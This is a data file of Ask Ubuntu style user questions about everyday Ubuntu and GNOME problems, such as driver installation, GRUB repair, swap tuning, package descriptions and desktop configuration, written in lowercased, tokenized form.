78181	what does this mean in gnome-shell.css ? and also specifically what is `` ems ''	i am tweaking the look of gnome shell and was asking my self what the following , and also specifically what `` ems '' means in gnome-shell.css /* the remaining popup-menu sizing is all done in ems , so that if you * override .popup-menu.font-size , everything else will scale with it . */ would somebody explain it to me ? i prefear to not break anything if possible , so thats why i am asking . thanks in advance ! roberto
78183	installing curl.h library	could you help me install curl.h library ? i am creating a program that makes use of this c library . i 'm on ubuntu linux . thanks .
78189	access the ubuntu bug database using launchladlib	i 'm trying to write a python script using launchpadlib that can access the ubuntu bug database , but i ca n't find any obvious way to restrict the search to the bugs of a particular project/distro . i know i can access bugs using bug_one = launchpad.bugs [ < bug number > ] and i can access the ubuntu distribution using ubuntu = launchpad.distributions [ 'ubuntu ' ] but i ca n't find a way to combine the two so that i can retrieve a list of the bugs affecting ubuntu . the api reference documentation does n't mention any attribute of the project or distribution entry relating to the actual bugs ( just the bug supervisor ) , nor does the bug entry make it clear what project it affects . given the way the functions above work , i would have expected ubuntu_bugs = launchpad.distributions [ 'ubuntu ' ] .bugs [ < bug number > ] to return a certain bug affecting ubuntu , but it does n't and there 's no obvious way to do it .
78190	why does play/pause shortcut not work ?	when i would like to pause/play my radiotray application used the required shortcut the next window can been seen : how can i solve this problem ? sometimes the shortcut works , but i do not know why .
78193	how do i get catalyst 11.10 with ati radeon mobility hd 5470 working on an hp dv7 ?	i have a hp dv7 with a hd 5470 512m card . installation of the catalyst 11.10 is repeatedly failing on a fresh install of ubuntu 11.10 . catalyst 11.8 proprietary drivers were working well with ubuntu 11.04 . i have tried installing directly from the .run and generating the distribution specific packages . nothing has worked . after installation which goes through successfully , the system hangs on reboot after the flashing dots . i have to replace the /etc/x11/xorg.conf to get the x working . i have followed instructions as per the http : //wiki.cchtml.com/index.php/main_page wiki . request for support to ati/amd gives the response that this model is unsupported on linux by hp : ) . updated 14-nov i have reverted back to the open source drivers which work well enough for me .
78196	is it possible to check when a folder or a file is created ?	i am looking for a way to check when a specific folder and also a specific file were created . is it possible ? my system uses the ext3 file system . thanks a lot !
78198	nautilus-compatible file `` commander '' for power users	i was spoilt by konqueror in kde 3.5.x which used to : integrated browsing of ftp , dav , ssh , samba resources integrated terminals powerful multi-pane and tabs support ( it used to open web pages and other files ) i want to manage 4-8 directories at once , with the occasional ssh or samba directory . there are a lot of power-user file browsers , but i want something that plays nice with the existing nautilus - with previews , bookmarks , context actions etc .
78199	how can i add other languages and what are equivalent shortcuts for what `` alt+shift '' and `` crtl+shift '' does in windows ?	i want to type norwegian when i search via google . when i add norwegian from `` language support '' then the language of ubuntu changes . also , there was an option on windows , `` ctr + shift '' which switches between align left and right but i can not find the equivalent shortcut on linux . ( i know how to do these in libreoffice ) how can i add other languages to linux and what are equivalent shortcuts for what `` alt+shift '' and `` crtl+shift '' does in windows ?
78202	epiphany web application mode strangeness	using epiphany in gnome 3.2 i 've saved google docs as a web application . i have a script set-up that will either switch to an app ( using wmctrl ) or launch it if it 's not open - i then xbindkeys to launch that script for different applications , pointing it at a different .desktop file for different apps . this all works well except for my google docs app . when launched from activities , or from the cli using the exec line from the .desktop file all is well , but when launched via my script epiphany does n't use web application mode , which means i get all the browser chrome . the script is simple - it just uses grep and sed to extract the exec line from the .desktop file and execute it . using echo i can see that it 's doing that correctly and , in fact , if i run what it echos myself from the cli then epiphany does use web application mode . does anyone have an idea what the missing piece of this puzzle is ? here 's the script : $ cat ~/bin/desktop-open # ! /bin/bash name=`grep '^name= ' $ 1 | head -n1 | sed 's/^name=// ' | sed 's/ % .//'` exec=`grep '^exec= ' $ 1 | head -n1 | sed 's/^exec=// ' | sed 's/ % .//'` wmctrl -xa $ name || $ exec &
78203	mysterious ram and swap usage	on my hp laptop i have 8gb ram and a ssd 4gb cached 500gb hd . i 'm running ubuntu 11.10 x64 recently i set the swappiness parameter to 0 to try to totally avoid the usage of swap , i know is nearly impossible to avoid the swap , but i will to reduce at minimum the swap usage . i noticed that even if i have 8gb of ram , and even with swappiness to 0 , the ram is never over 3,6gb and the swap usage is huge.. anyone knows how to set ubuntu to use the entire ram before starting to swap ? thanks in advance
78206	how to reset the language of the package descriptions	i have had german as my main language about a year ago . later i changed it to english . most parts of the system accepted the change . the notable exceptions are the package descriptions , which remain in german for some packages . you can see in the image ( apt-cache and software-center ) , that while some descriptions are in english , some have remained in german . so the question is : how do i reset this ? i guess that there is somewhere a description cache that needs to be told that it should update all descriptions ? edit : as asked : the output of some language related commands : $ cat /etc/default/locale lang= '' en_us.utf-8 '' $ apt-config dump | grep lang acquire : :languages `` '' ; acquire : :languages : : `` de_de '' ; acquire : :languages : : `` de '' ; acquire : :languages : : `` en '' ; acquire : :languages : : `` none '' ; $ locale lang=de_de.utf-8 language=en lc_ctype= '' de_de.utf-8 '' lc_numeric= '' de_de.utf-8 '' lc_time= '' de_de.utf-8 '' lc_collate= '' de_de.utf-8 '' lc_monetary= '' de_de.utf-8 '' lc_messages= '' de_de.utf-8 '' lc_paper= '' de_de.utf-8 '' lc_name= '' de_de.utf-8 '' lc_address= '' de_de.utf-8 '' lc_telephone= '' de_de.utf-8 '' lc_measurement= '' de_de.utf-8 '' lc_identification= '' de_de.utf-8 '' lc_all= as a note : i 'm not sure what each entry means , but some of the de_de.utf-8 are probably ok , since i do want paper-sizes , monetary , time , etc . in standard german formats .
78207	save unity desktop session	is there a way to save current session ( the applications + the organization of windows in desktops ) in unity and load it when needed ? i 'm using 11.10 .
78209	how do i install the graphic drivers on an hp workstation xw4100 ?	can someone help me install the graphic card of the hp workstation xw4100 ? the card info is : quadro4 980 xgl/agp/sse2 1.5.8 nvidia 96.43.20 i 'm tried to install the nvidia-linux-x86-1.0-9639-pkg1.run in init-3 mode . i could not succeed due to an `` cant find kernel source on nvidia driver install '' error . i managed to install the *nvidia_96* & *nvidia_96_updates* ( installed but not activated ) drivers . thx for your help ! if you nedd more info , just let me know
78211	just 8,4 gb free in share me	i just bought 20 gb extra , but when i try to access the shareme folder and copy my backup folder ( 9,8 gb ) it says it 's just 8,4 gb available . according to the account it should be 25 . what am i doing wrong ? do i need to wait ?
78212	sort files on the filesystem	my mp3 player plays files in the order they have been placed onto the filesystem . now it seems to nautilus copies files in some random order , so when listening to an audio book or something i get all the chapters in random order , wich is n't so great when your on a bicycle so you ca n't take your mp3 player out of your pocket to find the right one . when using mc ( midnight commander ) most files are copies in alphabetical order , and that 's the way i want it to happen . so is there ... any way to tell nautilus to copy files and folders in alphabetical order ? a program wich can sort the files and folders in alphabetical order directly on the filesystem ? additional information : elementary os 0.1 jupiter ( based on ubuntu 10.10 ) 64-bits copying music over from an ntfs filesystem to a strangely formed fat32 filesystem on the mp3 player .
78213	no animations shown when restoring a minimized window	for some reason i do n't see the minimizing animation while minimizing the window , i see the animation only when i reopen the window after it has been minimized . does anyone know why ?
78214	compare installed deb package with deb file	i have some problems with one deb package installed on my ubuntu server . i want to make sure that the files that are installed in my system from that package are the same as they are in a deb file . what is the easiest to to check if the installed deb package has no changes from the original files and if there are some change to see the diff ?
78219	how to turn off copy function when pressing mouse wheel ?	how to turn off copy function when pressing mouse2 ( wheel ) button ? any ideas ?
78222	a problem with ubuntu software center	im having problems with my software center .. when i want to install some package that followin message it appears '' items can not be installed or removed until the package catalog is repaired . do you want to repair it now ? '' after i click repair , another window pops up , saying : '' package operation fails - the installation or removal of a software package failed '' i click repair , and a few seconds later , it pops up again ! ! ! ! no matter how many times i click repair , nothing happens . also .. i 've another problem with update manager that shows me the following message : '' the package system is broken . check if you are using third party repositories . if so disable them , since they are a common source of problems . furthermore run the following command in a terminal : apt-get install -f '' please provide a solution
78233	brightness ca n't be adjusted	i just installed ubuntu 12.04 yesterday and i ca n't seem to turn the brightness down . the function keys change the slider but not the brightness and the keys work perfectly on windows 7 . i am using hp pavilion dv6-6121tx notebook pc .
78235	how do i accept an agreement in terminal ?	well , i 'm trying to install compizconfigure settings through terminal and it worked fine but its still in the process of installation , now there is a agreement that has shown up where you can scroll down to but is there a special key i 'm supposed to press to continue ? i 've hit enter nothing happened , to be honest i 'll be waiting for a reply asap ! until then i 'll leave the installation on until someone has been able to fix it for me .
78238	new ubuntu/linux flavor	i love ubuntu 11.10 but i hate unity ... we have a team of developers here ( 15 ) and we all use ubuntu and we want to have our own `` ubuntu '' with our software pre-installed . every time we install ubuntu for a new employee we have to remove unity evolution totem ( and more ) and we have to install : vim firefox 7 yed ( and more ) is it easy to build a new version or flavor of linux based on ubuntu that match our needs ? thanks
78240	where does gnome 3 store panel orientation ?	what file does gnome3 ( without unity ) store the top/bottom panel `` orientation '' settings in ? this sort of thing used to be available in the gconf-editor under apps/panel , but there does n't seem to be anything about panel orientation there anymore . where can i find it ? i do n't even have a ~/.gconf/apps/panel directory , so i ca n't reset as described in this other question ( probably gnome2 info ) . i have ~/.gconf/apps/panel3-applets and ~/.gconf/apps/gnome-settings/gnome-panel , but neither of them has anything about panel orientation ( the former just has applet config , as you 'd expect ; the latter just has a % gconf.xml containing only run history ) . i even removed my ~/.gconf directory entirely ( well , okay , i renamed it ) and rebooted , no change . clearly not stored in there . nor in ~/.gconfd . background : i moved everything to one panel ( prefer not having top and bottom ) , then thought i 'd try docking it to the left to see what that was like . what it 's like is : non-functional . when i first log in it shows , but trying to do anything with it makes it disappear . unfortunately , one of the things that makes it disappear is trying to access the properties dialog to dock it somewhere else ... update : okay , this is just weird . first i looked at all files changed under my home directory at about the time i made the change . no luck . so allowing for some poor programming , i 've now looked at the name of every file found by the following command issued from the root of my file system : find . -mmin -450 -mmin +240 -type f -not \ ( -wholename `` */home/tjc/.cache* '' -o -wholename `` */home/tjc/.thumbnails* '' -o -wholename `` */var/lib/dpkg/info* '' \ ) -printf `` % ty- % tm- % td % th : % tm : % ts % p \n '' | sort > ~/changed ... which did ( when i ran it ) encompass the relevant timeframe ( and quite a bit on either side ) , and for any file that looked like it could possibly contain this setting , i 've opened that file and looked at it . not a thing . that leaves us with the absense of a setting defaulting to `` dock left , '' which makes no sense at all . i took a backup earlier ( because i was going to be doing a lot of things to my system , mostly because i 've given up on unity , which is a great idea and may well get there in the end , but is just way too buggy / feature poor for prime time use yet ) . if i 'd realized it was going to be this hard to undo this stoopid little docking setting , i'd 've restored that backup 90 minutes ago . crazy .
78244	no partitions after grub recovery	i stupidly inserted the windows cd into my dual boot ubuntu 11.10 / windows xp system . i just wanted to see if i could install windows on my external usb hd , but did n't actually go ahead with the install . it seems like the windows cd messed up my mbr and i had to use boot-repair and the ubuntu 11.10 live cd to gain access to ubuntu again . it seems to boot up a little differently ( slower ) but works . however , i now cant see any of my partitions in nautilus ( there are 3 ) . when i open gparted , it just shows my whole hard drive as unallocated ( i know it has a windows partition that works and my ubuntu partition that i am using now ) . if i insert a usb pen , it is also not visible in nautilus but in gparted shows up as a fat32 partition ( which is correct although i can not access it ) . sudo fdisk -l gives the following : demian @ dimbo-tp : ~ $ sudo fdisk -l [ sudo ] password for demian : omitting empty partition ( 5 ) disk /dev/sda : 320.1 gb , 320072933376 bytes 240 heads , 63 sectors/track , 41345 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x877b877b device boot start end blocks id system /dev/sda1 * 63 63842309 31921123+ 7 hpfs/ntfs/exfat /dev/sda2 63844350 133484084 34819867+ 5 extended /dev/sda3 127636488 133484084 2923798+ 82 linux swap / solaris /dev/sda4 133484085 625137344 245826630 83 linux /dev/sda5 63844352 123445247 29800448 83 linux /dev/sda6 123447296 127635455 2094080 82 linux swap / solaris disk /dev/sdb : 8100 mb , 8100249600 bytes 12 heads , 40 sectors/track , 32960 cylinders , total 15820800 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc3072e18 device boot start end blocks id system /dev/sdb1 * 5992 15820799 7907404 c w95 fat32 ( lba ) here is my grub.conf file . like i said before , i had to use the 'boot-repair ' utility with the live cd to get grub working again . i think that this utility maybe created a new grub for me because the startup is definitely not the same . the screen goes blank for a while , and then the ubuntu loading dots come up for a brief moment ( instead of during the whole startup process ) before the dektop is displayed . anyway : # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod vbe insmod vga insmod video_bochs insmod video_cirrus } insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos6 ) ' search -- no-floppy -- fs-uuid -- set=root 5349ff67-b7b7-489f-a881-ae49c1dcd84a if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=auto load_video insmod gfxterm insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos6 ) ' search -- no-floppy -- fs-uuid -- set=root 5349ff67-b7b7-489f-a881-ae49c1dcd84a set locale_dir= ( $ root ) /boot/grub/locale set lang=en_us insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=10 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # if [ $ { recordfail } ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ linux_gfx_mode '' ! = `` text '' ] ; then load_video ; fi menuentry 'ubuntu , with linux 3.0.0-12-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail set gfxpayload= $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos6 ) ' search -- no-floppy -- fs-uuid -- set=root 5349ff67-b7b7-489f-a881-ae49c1dcd84a linux /boot/vmlinuz-3.0.0-12-generic root=uuid=5349ff67-b7b7-489f-a881-ae49c1dcd84a ro quiet splash vt.handoff=7 initrd /boot/initrd.img-3.0.0-12-generic } menuentry 'ubuntu , with linux 3.0.0-12-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos6 ) ' search -- no-floppy -- fs-uuid -- set=root 5349ff67-b7b7-489f-a881-ae49c1dcd84a echo 'loading linux 3.0.0-12-generic ... ' linux /boot/vmlinuz-3.0.0-12-generic root=uuid=5349ff67-b7b7-489f-a881-ae49c1dcd84a ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.0.0-12-generic } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos6 ) ' search -- no-floppy -- fs-uuid -- set=root 5349ff67-b7b7-489f-a881-ae49c1dcd84a linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos6 ) ' search -- no-floppy -- fs-uuid -- set=root 5349ff67-b7b7-489f-a881-ae49c1dcd84a linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry `` microsoft windows xp professional ( on /dev/sda1 ) '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 72a89361a89322a1 drivemap -s ( hd0 ) $ { root } chainloader +1 } # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # how can i get things back to normal . thanks , demian .
78245	podcatcher for home server and desktop pc ( frontend/backend )	i 've got a home server that is always on and online but has n't got a display . what i 'd like to do is the following : the server checks my podcast subscriptions and downloads them in the background . when i switch on my desktop pc and open the podcatcher application , the files are already download and i can start listening or syncing right away . do you know a podcatcher that is split up like that in frontend and backend ?
78246	ubuntu one disconnects after some time	my ubuntu one deamon keeps disconnecting , it tries to connect for few seconds , gets connected for few seconds then goes offline . i tried u1sdtool -q u1sdtool -- start u1sdtool -c still no remedy how to solve it ? thanx
78248	change user password while password is empty	i have a realy strange problem in ubuntu 11.10 . i have by accident my password set to empty . if i wa n't to install software now the system asks for a password , but i have n't one anymore . if i enter my old password it sais it 's wrong and if i leave it empty it also does . now i wa n't to set my password back , but the system asks for the old password before i can change it . that password does n't exist , so i ca n't do anything anymore ! can someone help me please ?
78251	problem in installing ubuntu 11.10 and 10.04 in mac using cd	i have a macbook air ( late 2008 ) i burned the ubuntu iso file ( 32 bit ) to a blank 700mb cd using disk utility ( the proper way ) when i booted into the cd i got a black screen then a black screen with ubuntu logo and 4 options : - `` try without install '' `` install '' `` check disk for errors `` `` boot from 1st hard drive `` which ever option i choose makes my mac reboot back to my initial hard drive i really want ubuntu but am not able to install it : / what am i doing wrong ? ? please help p.s-i tried the following things with both the softwares ( 11.10 and 10.04 ) and i am not able to make a bootable pen drive btw i downloaded the iso from the official site , the download said it is 695 mb but it was 729 mb ( is there something wrong with this ? )
78253	is it possible to downgrade gcc 4.6.1 to 4.4.x ?	i 've tried the following : sudo apt-get remove gcc sudo apt-get install gcc-4.4 but this does not work , running gcc -- version gives a 'no such file or directory ' error .
78256	lspci and lshw show no network devices	upgraded to ocelot over the weekend . all had been working ok until i booted the computer this morning . now i have no wired network connectivity through the integrated card . networking icon shows `` no network devices available '' . sudo lshw -c network returns nothing lspci -nn appears to show no network devices lights are blinking as normal on the network card . onboard lan is enabled in bios i 've tried a suggestion i saw elsewhere involving : service network-manager stop rm /var/lib/networkmanager/networkmanager.state service network-manager start no luck . i 'm decent with a command line but not a linux developer so i 'm out of ideas at this point . any thoughts or additional info needed ? lspci output : - 00:00.0 host bridge : intel corporation 82945g/gz/p/pl memory controller hub ( rev 02 ) - 00:01.0 pci bridge : intel corporation 82945g/gz/p/pl pci express root port ( rev 02 ) - 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 01 ) - 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 01 ) - 00:1c.2 pci bridge : intel corporation n10/ich 7 family pci express port 3 ( rev 01 ) - 00:1c.3 pci bridge : intel corporation n10/ich 7 family pci express port 4 ( rev 01 ) - 00:1c.4 pci bridge : intel corporation 82801gr/gh/ghm ( ich7 family ) pci express port 5 ( rev 01 ) - 00:1c.5 pci bridge : intel corporation 82801gr/gh/ghm ( ich7 family ) pci express port 6 ( rev 01 ) - 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 01 ) - 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 01 ) - 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 01 ) - 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 01 ) - 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 01 ) - 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev e1 ) - 00:1f.0 isa bridge : intel corporation 82801gb/gr ( ich7 family ) lpc interface bridge ( rev 01 ) - 00:1f.1 ide interface : intel corporation 82801g ( ich7 family ) ide controller ( rev 01 ) - 00:1f.2 ide interface : intel corporation n10/ich7 family sata ide controller ( rev 01 ) - 00:1f.3 smbus : intel corporation n10/ich 7 family smbus controller ( rev 01 ) - 01:00.0 vga compatible controller : ati technologies inc rv770 le [ radeon hd 4800 series ] - 01:00.1 audio device : ati technologies inc hd48x0 audio - 07:01.0 multimedia audio controller : creative labs ca0106 soundblaster - 07:02.0 communication controller : conexant systems , inc. hsf 56k data/fax modem - 07:05.0 firewire ( ieee 1394 ) : texas instruments tsb43ab23 ieee-1394a-2000 controller ( phy/link )
78262	how to focus the desktop on unity ?	i 'm using ubuntu 11.10 ( unity 4.24.0 ) and i ca n't seem to focus the desktop . for example , if i press mod4+d , the window i had opened stays focused , but the image is see is my wallpaper . if i minimize all windows one by one , the last window i minimize is still focused when the desktop finally appears . this means i ca n't add desktop icons , nor use the mouse in it . i thought about reporting a bug , but everything works fine on other computers with the latest version of ubuntu i 've used , so i 'm wondering about what 's happening . before , when i pressed mod4+d , the unity top menu would say `` desktop - file edit ... '' and i could use the desktop properly . thanks in advance !
78268	create a file type association for my truecrypt volumes	i have installed truecrypt in windows tc extensions are aasociated with truecrypt my question is how do i make my ubuntu 11.10 system associate *.tc extension to open with truecrypt . also the app opens just fine but is there any way to open it only after u enter password and not during the mounting process . just like synaptic ...
78270	brightness settings on ubuntu 11.10 64bit , hardware dell 1555 with ati mobility radeon hd4570	my laptop dell studio 1555 has ubuntu 11.10 . at every boot i have to set the brightness level as it gets reset to 100 % . could you please help me out to find a way not to change it every time ? thank you !
78271	how do i replace corrupted /etc/inittab and /etc/init.d/rcs files ?	i am using ubuntu 11.10 on my laptop and i have managed to overwrite my /etc/inittab and /etc/init.d/rcs files while running a stupid script with sudo . can anyone please provide me the default installed /etc/inittab and /etc/init.d/rcs files on a ubuntu 11.10 system so that i can restore it back ?
78273	gnome 3.2 menu not loading	gnome 3.2 menu is not loading . i wanted to add a minimize and maximize to the right of my windows . so i did the following : gconftool-2 -- set /apps/metacity/general/button_layout -- type string `` menu : minimize , maximize , close '' logout and login that it per the instructions of this website : instructions i logged out and back in and that was it . no menu . help ! ! ! by the way , there is a fix on this website to restore gnome . however it did not work . another odd thing was that gnome tweak tool is black under the shell extension tab .
78275	external monitor support for sandy bridge integrated graphics	i have a lenovo w520 with an i7 2720qm+nvidia quadro 2000m . now , i always use the system in integrated graphics mode , but i 've found that with this setup , the system does n't detect external monitors attached via the vga socket - it does detect them using discrete graphics . is there something i can do ? what if use a wdmi cable ? would the drivers at http : //intellinuxgraphics.org/2011q3.html solve this problem ( assuming i update to oneric ) ?
78281	how do i install joomla 1.7 on a lamp server ?	i have a joomla 1.7 business live site and would like to know how to install wamp server and joomla 1.7 on ubuntu 11.1 . i use it to work on site locally , then back it up and upload it to the live site root and install it with kickstart.php . i would like to do all this thru ubuntu instead of windows 7 ultimate .
78282	unity stuck in 2d mode , nvidia quadro graphics `` unknown '' , nvidia-current active but not in use	i 've seen this problem reported under several questions , but i have n't been able to resolve any of it so i thought i 'd bring it all in under one umbrella . i started a new job and was given a dell precision m6400 laptop with nvidia quadro fx 2700m graphics card . it had a previous version of ubuntu on it , but nobody had any passwords for it so i wiped the drive and did a fresh install of 11.10 from scratch . i did n't do any updates during installation , preferring to do them after boot . updates ran fine and the system works ... except unity is in 2d mode . system settings - > additional drivers shows that nvidia-current is active but not in use . system settings - > system info shows graphics driver unknown , experience standard nvidia x server settings is installed and working , re-writing the xorg.conf did nothing . /usr/lib/nux/unity_support_test -p opengl vendor string : nvidia corporation opengl renderer string : quadro fx 2700m/pci/sse2 opengl version string : 3.3.0 nvidia 285.05.09 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes one suggestion was to do a sudo apt-get -- purge remove nvidia* and that resulted in a scrambled screen on boot and a non-bootable installation . pressing the delete key on boot allowed me to access the recovery console and do a sudo apt-get install nvidia-current , which brought me back to a working , bootable system . another suggestion was to edit /etc/default/grub and change the line reading grub_cmdline_linux_default= '' quiet splash '' to read grub_cmdline_linux_default= '' quiet splash vmalloc=192mb '' thus allocating more video ram . i did that , followed by a sudo update-grub and a re-boot . no change . created a brand new standard user and logged on with that account , no change .
78284	is there a command that frees up ram ?	i was wondering if there is a command that frees up cached ram i often have 1gb cached ram when i only have 1.7gb of ram , and when i start an application like minecraft ( uses a lot of ram ) and the computer starts using 500mb of swap instead and becomes very very slow . that 's why i want to free up ram before i start any games/apps .
78285	icons missing from launcher , system settings , folders	various icons from launcher are missing . the first one is from home folder menu the second from terminal the last one from desktop switcher . this happened after i upgraded to 11.10 from 11.04 . i have created a new ( untitled folder ) folder in my desktop and the icon is missing too . the same occurs in system settings menu too . some icons like appearance , keyboard layout are missing too . sorry but i ca n't post a screenshot due to my reputation . any suggestions ?
78288	how can i move chrome 's buttons to the right in gnome3 's shell	i switched from unity to gnome shell in ubuntu . now chrome has the buttons on the left side , but i want them on the right . how can i fix this without switching to the system titlebar ? i also tried gconf-editor and modifying apps > metacity > general > button_layout , but that does n't make any difference .
78293	ubuntu software center not working	it says the package catalog needs repair . i tried with this command `` sudo apt-get install -f '' but it says unable to correct dependencies . why is that ?
78297	ooo-thumbnailer does n't work	i have ubuntu 11.10 installed on 3 different pcs and ooo-thumbnailer does n't work on any of them . i do n't know how to get it work -- i 've tried to uninstall and reinstall , i 've tried to update it to version 0.3.1 , but nothing . any ideas ?
78298	how do i configure upstart to run a script on shutdown when the process takes longer than 10secs ?	i am running ubuntu 11.10 in a virtual machine ( virtualbox ) to learn more about development in linux . i am using a git repository to save my work and have written a script to bundle my work up and save it to the shared folder for use while the virtual machine is not running . i would like to automatically run this script before shutdown so that my work is always available if the vm is off ( currently i have to manually run the script ) . i do n't know if upstart is the best way to accomplish this , but this is the config that i wrote as a test : description `` test script to run at shutdown '' start on runlevel [ 056 ] task script touch /media/sf_linuxeducation/start sleep 15 touch /media/sf_linuxeducation/start-long end script pre-start script touch /media/sf_linuxeducation/pre-start sleep 15 touch /media/sf_linuxeducation/pre-start-long end script post-start script touch /media/sf_linuxeducation/post-start sleep 15 touch /media/sf_linuxeducation/post-start-long end script pre-stop script touch /media/sf_linuxeducation/pre-stop sleep 15 touch /media/sf_linuxeducation/pre-stop-long end script post-stop script touch /media/sf_linuxeducation/post-stop sleep 15 touch /media/sf_linuxeducation/post-stop-long end script the result is that only one touch is accomplished ( the first touch in pre-start ) . what do i need to change to see one of the touches after the sleep to work ? or is there an easier way to get this accomplished ? thanks in advance .
78299	connect desktop to laptop using modem ubuntu	i have a modem which has lan cable connected to my desktop for internet and wifi connection which i connect to laptop for internet usage so now i can i connect laptop and desktop to each other so i can transfer files between them i have this modem my modem both desktop and laptop os are ubuntu
78300	can the android files app sync local file changes to u1	does the android files app sync changes made to local files back to u1 ? - it seems not to . i have a bunch of photos sync 'd to u1 but when i delete a photo from my device it remains on u1 . i 'd like the files app to 'sync ' i.e . when i delete a file from my device it deletes it from u1 .
78305	gksudo with cool gnome shell integration	what 's the command for executing this `` gksudo '' ( or whatever it is ) window from alt+f2 ?
78313	crash during upgrade from ubuntu 10.10 to 11.04 - now i have no desktop	i just attempted to upgrade from 10.10 to 11.04 using the synaptic package manager and it crashed towards the end of the process . i 'm not sure exactly at what point . i had to reboot the computer ( lenovo thinkpad x61s ) , and now i am only able to log into the command line when i boot up ubuntu . it appears to think it has 11.04 fully installed , but i ca n't get to the desktop . any help much appreciated .
78314	how do i deploy an openstack cloud with juju ?	i 'd like to get a test cloud up and running in preparation for a possible deployment of 12.04 . i messed with the uec a bit , but have had a much harder time finding anything helpful as a primer for the new stack . there is generic documentation on diablo , but there are likely to be a lot of pieces already handy in ubuntu that a specific guide could save time with . also , as much as i would love to , my budget does n't include the $ 4-6k to get a small cluster running with the canonical support .
78315	can gedit have the little + and - arrows like in notepad++ for easier navigation ?	i 'm currently creating a website for myself in html 5 , and i 've noticed that in the tutorials i 'm watching , notepad++ has little + or - boxes next to the line number which allow for elements of the website to be collapsible . for example , if i pressed the - box next to the section , it would collapse the entire section , and if i pressed + , it would reappear . is something like this possible in gedit , since things are starting to get crowded and it would be extremely helpful if that was possible . if not , can someone direct me to a text editor that does have it ( i.e . an alternative to notepad++ which has about the same features ) and works in ubuntu ?
78321	what .desktop file options are available ?	it looks like we 've acquired quite a few new options in desktop files lately . some of these are explained in very narrow posts , such as how to add a static quicklist to a unity launcherentry . others are difficult to find documentation for . we seem to have non-standard items in some gnome applications , for instance , beginning with x-gnome- so the question is : where can i find information about all of these , including these extensions ? are there extensions for all desktop environments , like kde , xfce and lxde as well ? in other words , what i am seeking , is a complete desktop file reference . before you answer , please check for duplicates in http : //standards.freedesktop.org/desktop-entry-spec/latest/ar01s05.html . those are standard and that 's a good reference for those . it is all those other types i 'm interested in .
78327	how to enable nautilus desktop management in gnome shell ?	i 'm using gnome shell with the following extensions : weather , dock , window-navigator , user-theme , alternative-status-menu , noa11y . i checked `` have file manager handle the desktop '' in gnome tweak tool , at first the desktop icons were shown regularly , but upon reboot they went awol . is there anything else i need to do or could it be a conflict with any of my extensions ? thanks for your time .
